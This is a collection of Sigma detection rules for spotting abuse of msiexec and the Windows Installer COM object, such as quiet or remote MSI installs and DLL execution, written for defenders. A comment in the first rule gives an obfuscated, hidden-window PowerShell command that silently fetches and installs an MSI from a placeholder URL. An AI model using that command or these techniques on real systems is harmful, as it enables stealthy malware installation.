title: Obfuscated PowerShell MSI Install via WindowsInstaller COM
id: 7b6a7418-3afc-11f0-aff4-000d3abf478c
status: experimental
description: |
    Detects the execution of obfuscated PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (`WindowsInstaller.Installer`).
    The technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting
    malformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection
    by hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of `InstallProduct` and COM object creation, particularly combined with
    hidden window execution and suppressed UI, indicates an attempt to install software (likely malicious) without user interaction.
references:
    - https://informationsecuritybuzz.com/the-real-danger-behind-a-simple-windows-shortcut/
    - https://redcanary.com/blog/threat-intelligence/intelligence-insights-may-2025/
    - https://www.virustotal.com/gui/file/f9710b0ba4de5fa0e7ec27da462d4d2fc6838eba83a19f23f6617a466bbad457
author: Meroujan Antonyan (vx3r)
date: 2025-05-27
tags:
    - attack.stealth
    - attack.t1027.010
    - attack.t1218.007
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    # Example: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -C "$u='htps://example.com/';$i=New-Object -ComObject('indowsInstaller.Installer'.Insert(0,'W'));$i.UILevel=2;$i.InstallProduct($(if($u.StartsWith('htps://')){$u.Insert(2,'t')}else{$u}),'')";
    selection_img:
        - Image|endswith:
              - '\powershell_ise.exe'
              - '\powershell.exe'
              - '\pwsh.exe'
        - OriginalFileName:
              - 'PowerShell_ISE.EXE'
              - 'PowerShell.EXE'
              - 'pwsh.dll'
    selection_cli:
        CommandLine|contains|all:
            - '-ComObject'
            - 'InstallProduct('
            - '.Insert('
            - 'UILevel'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high

title: DllUnregisterServer Function Call Via Msiexec.EXE
id: 84f52741-8834-4a8c-a413-2eb2269aa6c8
status: test
description: Detects MsiExec loading a DLL and calling its DllUnregisterServer function
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md
    - https://lolbas-project.github.io/lolbas/Binaries/Msiexec/
    - https://twitter.com/_st0pp3r_/status/1583914515996897281
author: frack113
date: 2022-04-24
modified: 2024-03-13
tags:
    - attack.stealth
    - attack.t1218.007
logsource:
    product: windows
    category: process_creation
detection:
    selection_img:
        - Image|endswith: '\msiexec.exe'
        - OriginalFileName: '\msiexec.exe'
    selection_flag:
        CommandLine|contains|windash: ' -z '
    selection_dll:
        CommandLine|contains: '.dll'
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium

title: MSI Installation From Web
id: 5594e67a-7f92-4a04-b65d-1a42fd824a60
status: test
description: Detects installation of a remote msi file from web.
references:
    - https://twitter.com/_st0pp3r_/status/1583922009842802689
author: Stamatis Chatzimangou
date: 2022-10-23
tags:
    - attack.stealth
    - attack.t1218
    - attack.t1218.007
logsource:
    product: windows
    service: application
    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
detection:
    selection:
        Provider_Name: 'MsiInstaller'
        EventID:
            - 1040
            - 1042
        Data|contains: '://'
    condition: selection
falsepositives:
    - Unknown
level: medium

title: MsiExec Web Install
id: f7b5f842-a6af-4da5-9e95-e32478f3cd2f
related:
    - id: 8150732a-0c9d-4a99-82b9-9efb9b90c40c
      type: similar
status: test
description: Detects suspicious msiexec process starts with web addresses as parameter
references:
    - https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/
author: Florian Roth (Nextron Systems)
date: 2018-02-09
modified: 2022-01-07
tags:
    - attack.stealth
    - attack.t1218.007
    - attack.command-and-control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - ' msiexec'
            - '://'
    condition: selection
falsepositives:
    - False positives depend on scripts and administrative tools used in the monitored environment
level: medium

title: Msiexec Quiet Installation
id: 79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5
status: test
description: |
    Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.
    Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
references:
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md
    - https://twitter.com/_st0pp3r_/status/1583914244344799235
author: frack113
date: 2022-01-16
modified: 2024-12-01
tags:
    - attack.stealth
    - attack.t1218.007
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\msiexec.exe'
        - OriginalFileName: 'msiexec.exe'
    selection_cli:
        # Note that there is no space before and after the arguments because it's possible to write a commandline as such
        # Example: msiexec -q/i [MSI Package]
        CommandLine|contains|windash:
            - '-i'
            - '-package'
            - '-a'
            - '-j'
    selection_quiet:
        CommandLine|contains|windash: '-q'
    filter_user_temp:
        # The %temp% is a very common location for installers
        ParentImage|startswith: 'C:\Users\'
        ParentImage|contains: '\AppData\Local\Temp\'
    filter_system_temp:
        ParentImage|startswith: 'C:\Windows\Temp\'
    filter_ccm:
        ParentImage: 'C:\Windows\CCM\Ccm32BitLauncher.exe'
        IntegrityLevel:
            - 'System'
            - 'S-1-16-16384'
    condition: all of selection_* and not 1 of filter_*
falsepositives:
    - WindowsApps installing updates via the quiet flag
level: medium

title: PowerShell WMI Win32_Product Install MSI
id: 91109523-17f0-4248-a800-f81d9e7c081d
status: test
description: Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md
author: frack113
date: 2022-04-24
tags:
    - attack.stealth
    - attack.t1218.007
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|contains|all:
            - 'Invoke-CimMethod '
            - '-ClassName '
            - 'Win32_Product '
            - '-MethodName '
            - '.msi'
    condition: selection
falsepositives:
    - Unknown
level: medium

title: Suspicious MsiExec Embedding Parent
id: 4a2a2c3e-209f-4d01-b513-4155a540b469
status: test
description: Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md
author: frack113
date: 2022-04-16
modified: 2022-07-14
tags:
    - attack.stealth
    - attack.t1218.007
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\cmd.exe'
        ParentCommandLine|contains|all:
            - 'MsiExec.exe'
            - '-Embedding '
    filter_splunk_ufw:
        Image|endswith: ':\Windows\System32\cmd.exe'
        CommandLine|contains: 'C:\Program Files\SplunkUniversalForwarder\bin\'
    filter_vs:
        - CommandLine|contains: '\DismFoDInstall.cmd'
        - ParentCommandLine|contains|all:
              - '\MsiExec.exe -Embedding '
              - 'Global\MSI0000'
    condition: selection and not 1 of filter*
falsepositives:
    - Unknown
level: medium

title: Suspicious Msiexec Execute Arbitrary DLL
id: 6f4191bb-912b-48a8-9ce7-682769541e6d
status: test
description: |
    Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.
    Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
references:
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md
    - https://twitter.com/_st0pp3r_/status/1583914515996897281
author: frack113
date: 2022-01-16
modified: 2026-01-09
tags:
    - attack.stealth
    - attack.t1218.007
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\msiexec.exe'
        CommandLine|contains|windash: ' /Y'
    filter_main_legit_path:
        CommandLine|contains:
            - '\MsiExec.exe" /Y "C:\Program Files\'
            - '\MsiExec.exe" /Y "C:\Program Files (x86)\'
            - '\MsiExec.exe" /Y "C:\Windows\System32\'
            - '\MsiExec.exe" /Y "C:\Windows\SysWOW64\'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Legitimate script
level: medium

title: Suspicious Msiexec Quiet Install From Remote Location
id: 8150732a-0c9d-4a99-82b9-9efb9b90c40c
related:
    - id: f7b5f842-a6af-4da5-9e95-e32478f3cd2f
      type: similar
status: test
description: Detects usage of Msiexec.exe to install packages hosted remotely quietly
references:
    - https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-28
modified: 2025-10-07
tags:
    - attack.stealth
    - attack.t1218.007
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\msiexec.exe'
        - OriginalFileName: 'msiexec.exe'
    selection_cli:
        # Note that there is no space before and after the arguments because it's possible to write a commandline as such
        # Example: msiexec -q/i [MSI Package]
        CommandLine|contains|windash:
            - '-i'
            - '-package'
            - '-a'
            - '-j'
    selection_quiet:
        CommandLine|contains|windash: '-q'
    selection_remote:
        CommandLine|contains:
            - 'http'
            - '\\\\'
    filter_optional_openoffice:
        CommandLine|contains|all:
            - '\AppData\Local\Temp\OpenOffice'
            - 'Installation Files\openoffice'
    condition: all of selection_* and not 1 of filter_optional_*
falsepositives:
    - Unknown
level: medium